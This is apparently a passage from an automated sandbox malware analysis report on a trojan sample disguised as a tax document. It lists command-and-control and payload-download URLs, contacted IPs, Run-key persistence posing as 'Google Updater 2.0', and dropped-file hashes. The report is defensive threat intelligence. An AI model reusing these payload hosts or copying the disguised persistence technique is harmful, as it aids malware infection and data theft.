                      http://rusianlover.icu/forum/logout.php?id=18097230%Avira URL Cloudsafe
                      http://estrelladamm.icu/get.php__vbaVarSetVar0%Avira URL Cloudsafe
                      http://rusianlover.icu/forum/logout.php?page=70%Avira URL Cloudsafe
                      http://estrelladamm.icu/old/GetDataAVK.exe4%VirustotalBrowse
                      http://estrelladamm.icu/old/GetDataAVK.exe0%Avira URL Cloudsafe
                      http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                      http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                      http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                      http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                      http://rusianlover.icu/forum/logout.php?id=52636310%Avira URL Cloudsafe
                      https://contoso.com/License0%URL Reputationsafe
                      https://contoso.com/License0%URL Reputationsafe
                      https://contoso.com/License0%URL Reputationsafe
                      http://rusianlover.icu/forum/logout.php?page=10%Avira URL Cloudsafe
                      https://contoso.com/Icon0%URL Reputationsafe
                      https://contoso.com/Icon0%URL Reputationsafe
                      https://contoso.com/Icon0%URL Reputationsafe
                      http://zakriasons.co/wp-includes/rest-api/endpoints/898/getwd.exe0%Avira URL Cloudsafe
                      http://rusianlover.icu/forum/logout.php?id=98855980%Avira URL Cloudsafe
                      http://rusianlover.icu/forum/logout.php?pid=4380%Avira URL Cloudsafe
                      http://rusianlover.icu/forum/logout.php?id=95576660%Avira URL Cloudsafe
                      http://estrelladamm.icu/old/get.php0%Avira URL Cloudsafe
                      http://rusianlover.icu/forum/logout.php?id=2442663t0%Avira URL Cloudsafe
                      http://rusianlover.icu/forum/logout.php0%Avira URL Cloudsafe
                      http://crl.mi0%Avira URL Cloudsafe
                      http://rusianlover.icu/forum/logout.php?id=80851540%Avira URL Cloudsafe
                      http://ocsp.digicert0%Avira URL Cloudsafe
                      http://rusianlover.icu/forum/logout.php?id=24426630%Avira URL Cloudsafe
                      https://l0ioz.icu/pub/bin.exe100%Avira URL Cloudmalware
                      http://rusianlover.icu/forum/logout.php?id=21400880%Avira URL Cloudsafe
                      http://rusianlover.icu/forum/logout.php?id=70866750%Avira URL Cloudsafe
                      https://contoso.com/0%URL Reputationsafe
                      https://contoso.com/0%URL Reputationsafe
                      https://contoso.com/0%URL Reputationsafe
                      http://estrelladamm.icu/old/GetDataAVK.exe20%Avira URL Cloudsafe
                      http://rusianlover.icu/forum/logout.php?page=830%Avira URL Cloudsafe
                      http://rusianlover.icu/forum/logout.php?id=31257710%Avira URL Cloudsafe
                      http://rusianlover.icu/forum/logout.php?pid=5670%Avira URL Cloudsafe
                      http://rusianlover.icu/forum/logout.php?pid=9250%Avira URL Cloudsafe
                      http://rusianlover.icu/forum/logout.php?id=11060760%Avira URL Cloudsafe
                      http://rusianlover.icu/forum/logout.php?id=92928860%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      zakriasons.co
                      		104.21.55.228
                      		truetrueunknown
                      estrelladamm.icu
                      		8.210.47.214
                      		truetrueunknown
                      rusianlover.icu
                      		212.114.52.43
                      		truetrueunknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://rusianlover.icu/forum/logout.php?id=1809723true
                      • Avira URL Cloud: safe
                      		unknown
                      http://rusianlover.icu/forum/logout.php?page=7true
                      • Avira URL Cloud: safe
                      		unknown
                      http://estrelladamm.icu/old/GetDataAVK.exetrue
                      • 4%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      http://rusianlover.icu/forum/logout.php?id=5263631true
                      • Avira URL Cloud: safe
                      		unknown
                      http://rusianlover.icu/forum/logout.php?page=1true
                      • Avira URL Cloud: safe
                      		unknown
                      http://zakriasons.co/wp-includes/rest-api/endpoints/898/getwd.exetrue
                      • Avira URL Cloud: safe
                      		unknown
                      http://rusianlover.icu/forum/logout.php?id=9885598true
                      • Avira URL Cloud: safe
                      		unknown
                      http://rusianlover.icu/forum/logout.php?pid=438true
                      • Avira URL Cloud: safe
                      		unknown
                      http://rusianlover.icu/forum/logout.php?id=9557666true
                      • Avira URL Cloud: safe
                      		unknown
                      http://rusianlover.icu/forum/logout.phptrue
                      • Avira URL Cloud: safe
                      		unknown
                      http://rusianlover.icu/forum/logout.php?id=8085154true
                      • Avira URL Cloud: safe
                      		unknown
                      http://rusianlover.icu/forum/logout.php?id=2442663true
                      • Avira URL Cloud: safe
                      		unknown
                      http://rusianlover.icu/forum/logout.php?id=2140088true
                      • Avira URL Cloud: safe
                      		unknown
                      http://rusianlover.icu/forum/logout.php?id=7086675true
                      • Avira URL Cloud: safe
                      		unknown
                      http://rusianlover.icu/forum/logout.php?page=83true
                      • Avira URL Cloud: safe
                      		unknown
                      http://rusianlover.icu/forum/logout.php?id=3125771true
                      • Avira URL Cloud: safe
                      		unknown
                      http://rusianlover.icu/forum/logout.php?pid=567true
                      • Avira URL Cloud: safe
                      		unknown
                      http://rusianlover.icu/forum/logout.php?pid=925true
                      • Avira URL Cloud: safe
                      		unknown
                      http://rusianlover.icu/forum/logout.php?id=1106076true
                      • Avira URL Cloud: safe
                      		unknown
                      http://rusianlover.icu/forum/logout.php?id=9292886true
                      • Avira URL Cloud: safe
                      		unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      http://estrelladamm.icu/get.php__vbaVarSetVarexplorer.exe, 00000003.00000002.575685224.0000000006870000.00000004.00000001.sdmp, iom7q73oi.exe, 00000022.00000000.308012528.0000000000401000.00000020.00020000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://nuget.org/NuGet.exepowershell.exe, 00000025.00000002.354101817.0000024891478000.00000004.00000001.sdmpfalse
                        		high
                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000025.00000002.347954854.000002488161F000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000025.00000002.347954854.000002488161F000.00000004.00000001.sdmpfalse
                          		high
                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000025.00000002.347954854.000002488161F000.00000004.00000001.sdmpfalse
                            		high
                            https://www.mql5.com/ru/articles/download/69/system_data_sqlite.zip1explorer.exe, 00000003.00000002.576708972.0000000007470000.00000004.00000001.sdmpfalse
                              		high
                              https://contoso.com/Licensepowershell.exe, 00000025.00000002.354101817.0000024891478000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              https://contoso.com/Iconpowershell.exe, 00000025.00000002.354101817.0000024891478000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              https://github.com/Pester/Pesterpowershell.exe, 00000025.00000002.347954854.000002488161F000.00000004.00000001.sdmpfalse
                                		high
                                http://estrelladamm.icu/old/get.phpexplorer.exe, 00000003.00000002.576708972.0000000007470000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://rusianlover.icu/forum/logout.php?id=2442663texplorer.exe, 00000003.00000002.553970211.0000000004B20000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://crl.mipowershell.exe, 00000025.00000002.358882072.00000248FF834000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://ocsp.digicertexplorer.exe, 00000003.00000002.553970211.0000000004B20000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://l0ioz.icu/pub/bin.exeexplorer.exe, 00000003.00000002.575685224.0000000006870000.00000004.00000001.sdmp, iom7q73oi.exe, 00000022.00000000.308012528.0000000000401000.00000020.00020000.sdmptrue
                                • Avira URL Cloud: malware
                                		unknown
                                http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000025.00000002.347954854.000002488161F000.00000004.00000001.sdmpfalse
                                  		high
                                  https://contoso.com/powershell.exe, 00000025.00000002.354101817.0000024891478000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  https://nuget.org/nuget.exepowershell.exe, 00000025.00000002.354101817.0000024891478000.00000004.00000001.sdmpfalse
                                    		high
                                    http://estrelladamm.icu/old/GetDataAVK.exe2explorer.exe, 00000003.00000002.553970211.0000000004B20000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown

                                    Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public

                                    IPDomainCountryFlagASNASN NameMalicious
                                    104.21.55.228
                                    		zakriasons.coUnited States
                                    		13335CLOUDFLARENETUStrue
                                    212.114.52.43
                                    		rusianlover.icuGermany
                                    		30823COMBAHTONcombahtonGmbHDEtrue
                                    8.210.47.214
                                    		estrelladamm.icuSingapore
                                    		45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCtrue

                                    Private

                                    IP
                                    192.168.2.1

                                    General Information

                                    Joe Sandbox Version:31.0.0 Emerald
                                    Analysis ID:366082
                                    Start date:10.03.2021
                                    Start time:11:41:02
                                    Joe Sandbox Product:CloudBasic
                                    Overall analysis duration:0h 13m 45s
                                    Hypervisor based Inspection enabled:false
                                    Report type:light
                                    Sample file name:Documento--SII--33875.bin (renamed file extension from bin to exe)
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                    Number of analysed new started processes analysed:28
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:12
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • HDC enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Detection:MAL
                                    Classification:mal100.phis.troj.spyw.evad.winEXE@26/13@35/4
                                    EGA Information:Failed
                                    HDC Information:
                                    • Successful, ratio: 69.9% (good quality ratio 66.5%)
                                    • Quality average: 85.3%
                                    • Quality standard deviation: 26.4%
                                    HCA Information:
                                    • Successful, ratio: 97%
                                    • Number of executed functions: 0
                                    • Number of non-executed functions: 0
                                    Cookbook Comments:
                                    • Adjust boot time
                                    • Enable AMSI
                                    Warnings:
                                    • Exclude process from analysis (whitelisted): taskhostw.exe, BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, SgrmBroker.exe, svchost.exe
                                    • TCP Packets have been reduced to 100
                                    • Excluded IPs from analysis (whitelisted): 131.253.33.200, 13.107.22.200, 23.57.80.111, 13.88.21.125, 51.11.168.160, 52.137.90.34, 104.42.151.234, 205.185.216.10, 205.185.216.42, 51.103.5.186, 92.122.213.247, 92.122.213.194, 104.43.139.144, 20.54.26.129, 51.104.139.180, 52.155.217.156
                                    • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, wns.notify.trafficmanager.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, windowsupdate.redir.update.microsoft.com.nsatc.net, redir.update.microsoft.com.nsatc.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, skypedataprdcolcus16.cloudapp.net, dual-a-0001.dc-msedge.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, windowsupdate.microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, skypedataprdcolwus16.cloudapp.net, vip2-par02p.wns.notify.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                    • Report size getting too big, too many NtEnumerateKey calls found.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • Report size getting too big, too many NtSetInformationFile calls found.

                                    Simulations

                                    TimeTypeDescription
                                    11:41:57AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce Google Updater 2.0 C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe
                                    11:42:00API Interceptor12x Sleep call for process: CpSHySoEfzH.exe modified
                                    11:42:05AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Google Updater 2.0 "C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe"
                                    11:42:14AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce Google Updater 2.0 C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe
                                    11:42:22AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Google Updater 2.0 "C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe"
                                    11:42:28API Interceptor31x Sleep call for process: explorer.exe modified
                                    11:42:32API Interceptor1x Sleep call for process: iom7q73oi.exe modified
                                    11:42:35API Interceptor77x Sleep call for process: powershell.exe modified
                                    11:42:35AutostartRun: HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Google Updater 2.0 "C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe"

                                    Joe Sandbox View / Context

                                    IPs

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    104.21.55.228OnZH4ftMLU.exeGet hashmaliciousBrowse
                                    • zakriasons.co/wp-includes/rest-api/endpoints/898/getwd.exe
                                    212.114.52.43OnZH4ftMLU.exeGet hashmaliciousBrowse
                                    • rusianlover.icu/forum/logout.php
                                    8.210.47.214OnZH4ftMLU.exeGet hashmaliciousBrowse
                                    • estrelladamm.icu/old/GetDataAVK.exe

                                    Domains

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    rusianlover.icuOnZH4ftMLU.exeGet hashmaliciousBrowse
                                    • 212.114.52.43
                                    estrelladamm.icuOnZH4ftMLU.exeGet hashmaliciousBrowse
                                    • 8.210.47.214
                                    zakriasons.coOnZH4ftMLU.exeGet hashmaliciousBrowse
                                    • 104.21.55.228

                                    ASN

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCOnZH4ftMLU.exeGet hashmaliciousBrowse
                                    • 8.210.47.214
                                    subscription_1615310237.xlsGet hashmaliciousBrowse
                                    • 8.209.66.127
                                    subscription_1615310237.xlsGet hashmaliciousBrowse
                                    • 8.209.66.127
                                    document-1317854575.xlsGet hashmaliciousBrowse
                                    • 8.210.31.137
                                    document-1317854575.xlsGet hashmaliciousBrowse
                                    • 8.210.31.137
                                    COSCO Arrival Notice with Shipping CBHU9101943.xlsxGet hashmaliciousBrowse
                                    • 8.209.68.209
                                    Setup.exeGet hashmaliciousBrowse
                                    • 8.210.66.206
                                    Setup.exeGet hashmaliciousBrowse
                                    • 8.210.66.206
                                    subscription_1614969542.xlsGet hashmaliciousBrowse
                                    • 8.209.66.127
                                    subscription_1614969542.xlsGet hashmaliciousBrowse
                                    • 8.209.66.127
                                    virus.xlsGet hashmaliciousBrowse
                                    • 8.208.97.177
                                    virus.xlsGet hashmaliciousBrowse
                                    • 8.208.97.177
                                    0304_87496944093261.docGet hashmaliciousBrowse
                                    • 47.254.131.254
                                    0304_56958375050481.docGet hashmaliciousBrowse
                                    • 47.254.131.254
                                    Static.dllGet hashmaliciousBrowse
                                    • 47.254.131.254
                                    Static.dllGet hashmaliciousBrowse
                                    • 47.254.131.254
                                    msals.dllGet hashmaliciousBrowse
                                    • 47.254.131.254
                                    document-1996534889.xlsGet hashmaliciousBrowse
                                    • 8.209.68.209
                                    document-1996534889.xlsGet hashmaliciousBrowse
                                    • 8.209.68.209
                                    0303_15995446253021.docGet hashmaliciousBrowse
                                    • 47.254.131.254
                                    COMBAHTONcombahtonGmbHDEOnZH4ftMLU.exeGet hashmaliciousBrowse
                                    • 212.114.52.43
                                    Sales Order confirmation_pdf.exeGet hashmaliciousBrowse
                                    • 152.89.247.27
                                    Purchase Order (2).exeGet hashmaliciousBrowse
                                    • 152.89.247.74
                                    Bestellung Nr. 20210038.exeGet hashmaliciousBrowse
                                    • 152.89.247.75
                                    SecuriteInfo.com.Variant.Razy.849114.20596.exeGet hashmaliciousBrowse
                                    • 91.200.103.83
                                    uitTYe3ZE5EMN3Z.exeGet hashmaliciousBrowse
                                    • 45.154.4.68
                                    mn9VCjzNP8ATu3F.exeGet hashmaliciousBrowse
                                    • 45.154.4.68
                                    Aa7MaN2ae5.exeGet hashmaliciousBrowse
                                    • 45.138.172.158
                                    1RevKocjWoyhJ3y.exeGet hashmaliciousBrowse
                                    • 45.154.4.68
                                    Fichero19837123.txt.LNKGet hashmaliciousBrowse
                                    • 45.138.172.29
                                    Fichero19837123.txt.LNKGet hashmaliciousBrowse
                                    • 45.138.172.29
                                    rq0CWAh0pA.exeGet hashmaliciousBrowse
                                    • 160.20.147.195
                                    InvoiceApplication.exeGet hashmaliciousBrowse
                                    • 45.147.229.44
                                    item list _ pdf.exeGet hashmaliciousBrowse
                                    • 160.20.147.107
                                    10.dllGet hashmaliciousBrowse
                                    • 185.234.72.84
                                    UbrikQvjSc.exeGet hashmaliciousBrowse
                                    • 152.89.247.27
                                    Invoice copy and Payment request.xlsxGet hashmaliciousBrowse
                                    • 152.89.247.30
                                    counters.dllGet hashmaliciousBrowse
                                    • 45.155.173.242
                                    OzRW6h38aL.dllGet hashmaliciousBrowse
                                    • 45.155.173.242
                                    1d46a419ae040e2c284ce365d66c8971.exeGet hashmaliciousBrowse
                                    • 45.154.4.68
                                    CLOUDFLARENETUSWcihqRt2vr.exeGet hashmaliciousBrowse
                                    • 104.21.6.117
                                    tToCMQdejt.exeGet hashmaliciousBrowse
                                    • 104.21.3.86
                                    m5bCbJdk7l.exeGet hashmaliciousBrowse
                                    • 104.21.1.113
                                    6uRm50MU0l.exeGet hashmaliciousBrowse
                                    • 23.227.38.74
                                    kw8VTJCVE6.exeGet hashmaliciousBrowse
                                    • 23.227.38.74
                                    OnZH4ftMLU.exeGet hashmaliciousBrowse
                                    • 104.21.55.228
                                    Payment.exeGet hashmaliciousBrowse
                                    • 172.67.174.240
                                    Pro-doma 209901.exeGet hashmaliciousBrowse
                                    • 172.67.188.154
                                    #U0646#U0633#U062e#U0629 #U0628#U0646#U0643 #U0633#U0648#U064a#U0641#U062a 0083212 pdf.exeGet hashmaliciousBrowse
                                    • 162.159.134.233
                                    PO_20210310.exeGet hashmaliciousBrowse
                                    • 172.67.215.201
                                    bpMiLDP382.exeGet hashmaliciousBrowse
                                    • 104.17.63.50
                                    CF10550U5400-PDF.exeGet hashmaliciousBrowse
                                    • 162.159.135.233
                                    PO#5666HGS_pdf.exeGet hashmaliciousBrowse
                                    • 104.21.19.200
                                    CF10550U5400-PDF.exeGet hashmaliciousBrowse
                                    • 162.159.134.233
                                    PAYMENT SWIFT.exeGet hashmaliciousBrowse
                                    • 104.21.19.200
                                    103_FT21068D79MB_0770989439.exeGet hashmaliciousBrowse
                                    • 104.21.19.200
                                    DIEN CHUYEN TIEN 09.03.2020.exeGet hashmaliciousBrowse
                                    • 172.67.188.154
                                    Purchase Order.80078.Scan.pdf....exeGet hashmaliciousBrowse
                                    • 172.67.188.154
                                    H#U00f3a #U0111#U01a1n chi#U1ebfu l#U1ec7 PO # 79574.pdf.exeGet hashmaliciousBrowse
                                    • 172.67.188.154
                                    DOC 875674656-674667636.exeGet hashmaliciousBrowse
                                    • 172.67.188.154

                                    JA3 Fingerprints

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    57f3642b4e37e28f5cbe3020c9331b4cOnZH4ftMLU.exeGet hashmaliciousBrowse
                                    • 104.21.55.228
                                    yytr.dllGet hashmaliciousBrowse
                                    • 104.21.55.228
                                    vG4U0RKFY2.exeGet hashmaliciousBrowse
                                    • 104.21.55.228
                                    evil.docGet hashmaliciousBrowse
                                    • 104.21.55.228
                                    davay (2).exeGet hashmaliciousBrowse
                                    • 104.21.55.228
                                    davay.exeGet hashmaliciousBrowse
                                    • 104.21.55.228
                                    https://notification1.bubbleapps.io/version-test?debug_mode=trueGet hashmaliciousBrowse
                                    • 104.21.55.228
                                    https://secureddoc.unicornplatform.comGet hashmaliciousBrowse
                                    • 104.21.55.228
                                    5fd9d7ec9e7aetar.dllGet hashmaliciousBrowse
                                    • 104.21.55.228
                                    5fd885c499439tar.dllGet hashmaliciousBrowse
                                    • 104.21.55.228
                                    https://secureddoc.unicornplatform.com/Get hashmaliciousBrowse
                                    • 104.21.55.228
                                    http://contoubi00.epizy.com/ubi/Get hashmaliciousBrowse
                                    • 104.21.55.228
                                    https://secureddoc.unicornplatform.comGet hashmaliciousBrowse
                                    • 104.21.55.228
                                    http://vcomdesign.comGet hashmaliciousBrowse
                                    • 104.21.55.228
                                    https://aud-amplified.unicornplatform.com/Get hashmaliciousBrowse
                                    • 104.21.55.228
                                    https://cloud.vectorworks.net/links/11eb34bf3e0b15d489a10aa721e465bfGet hashmaliciousBrowse
                                    • 104.21.55.228
                                    https://dynalist.io/d/TcKkPvWijzGN4uv-0OCmM26AGet hashmaliciousBrowse
                                    • 104.21.55.228
                                    https://app.nihaocloud.com/f/06096e5837654796a4d4/Get hashmaliciousBrowse
                                    • 104.21.55.228
                                    https://ngor.zlen.com.ua/Restore/Click here to restore message automatically.htmlGet hashmaliciousBrowse
                                    • 104.21.55.228
                                    https://rebrand.ly/we9znGet hashmaliciousBrowse
                                    • 104.21.55.228

                                    Dropped Files

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    C:\Users\user\AppData\Local\Temp\iom7q73oi.exeOnZH4ftMLU.exeGet hashmaliciousBrowse
                                      C:\Users\user\AppData\Local\Temp\agq5ooig7au.exeOnZH4ftMLU.exeGet hashmaliciousBrowse

                                        Created / dropped Files

                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):1292
                                        Entropy (8bit):5.351662875791918
                                        Encrypted:false
                                        SSDEEP:24:3vQPpQrLAo4KAxX5qRPD42HOoVZnCvK39tCKnKJRSF8PQ9eF:oPerB4nqRL/HvfnCvO9tC4aR48Y9eF
                                        MD5:AC10FD09E6BB46F1ECB6FBBBC32BECA8
                                        SHA1:42C9BEBF04464BDF77CEF33ECE377F66832C2BCE
                                        SHA-256:0656EAD501AA0E11A199F00BAF5C6367BBD44FF736D8A4277C19FF6E27454492
                                        SHA-512:4F01D2DB224F17759BC03AEE508A732348AF43120FBA61107D11BE37399182D4CDFB6773D0A7E7F2B27FA1A9AC78395889D08DC8381DC995EAB322215DF8BEBB
                                        Malicious:false
                                        Preview: @...e................................................@..........8................'....L..}............System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.AutomationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServices4................Zg5..:O..g..q..........System.Xml..4...............T..'Z..N..Nvj.G.........System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<................):gK..G...$.1.q........System.Configuration<...............)L..Pz.O.E.R............System.Transactions.P................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                        C:\Users\user\AppData\Local\Temp\9sek3aw7533q9_1.exe
                                        Process:C:\Windows\SysWOW64\explorer.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):852996
                                        Entropy (8bit):5.888594490665969
                                        Encrypted:false
                                        SSDEEP:24576:vjmBlOdjWsqxOCNsYa/xHXhOCXlt4DOShLQK:n4yWZ
                                        MD5:2CED2C14EECE71C72C5E45E8A607BB4C
                                        SHA1:13A700A297A7E5697D69BB743C3B256AC10A14E2
                                        SHA-256:4EFD9A3FA2D25D6706213FEB3299DD0F73777AAD01217B9E3DF046064FDBBB7E
                                        SHA-512:199CB38D7F20F64B30D2CB2BA56DAB6C0D3B2685D85A990C085060752071B9620D131C5C25BBA9B3140C9816AE3515D6B7DBF794D3DD71DB15BB8D3F4EB04F06
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 40%
                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........].......................r.................................Rich...........................PE..L....BC`.....................p......C.............@.............................................................................(....................................................................................................................rdaals2.p...............................text............................... ..`.rdata..43.......@..................@..@.data............0..................@....idata..............................@....rsrc................ ..............@..@........................................................................................................................................................................................................................................................................................
                                        C:\Users\user\AppData\Local\Temp\9sek3aw7533q9_1.exe:14EDFC78
                                        Process:C:\Windows\SysWOW64\explorer.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):4
                                        Entropy (8bit):1.5
                                        Encrypted:false
                                        SSDEEP:3:P:P
                                        MD5:DF108E9C42B3E9FC686EA496455DDCCA
                                        SHA1:9C6589C0729B36D7D1DCF11E6CCE1EB22E682450
                                        SHA-256:B6D6A7E37E23E7A65E964BC982979CEB94AB98A49FCCF77CB888388FAFA974EB
                                        SHA-512:CF22BC1802EDFAB355CD89B31B4DCF1B635A8617C56BCF7FE56E3C3883C27D0C67B799434E243A27ACC766234BF85B3118F863ADB66EC617AB9B8E780730C7A8
                                        Malicious:false
                                        Preview: ....
                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_asikjyeb.4ye.ps1
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:very short file (no magic)
                                        Category:dropped
                                        Size (bytes):1
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3:U:U
                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                        Malicious:false
                                        Preview: 1
                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dkdwgbaz.aea.psm1
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:very short file (no magic)
                                        Category:dropped
                                        Size (bytes):1
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3:U:U
                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                        Malicious:false
                                        Preview: 1
                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oy5a4in0.j2z.ps1
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:very short file (no magic)
                                        Category:dropped
                                        Size (bytes):1
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3:U:U
                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                        Malicious:false
                                        Preview: 1
                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p1k4j5qt.gnv.psm1
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:very short file (no magic)
                                        Category:dropped
                                        Size (bytes):1
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3:U:U
                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
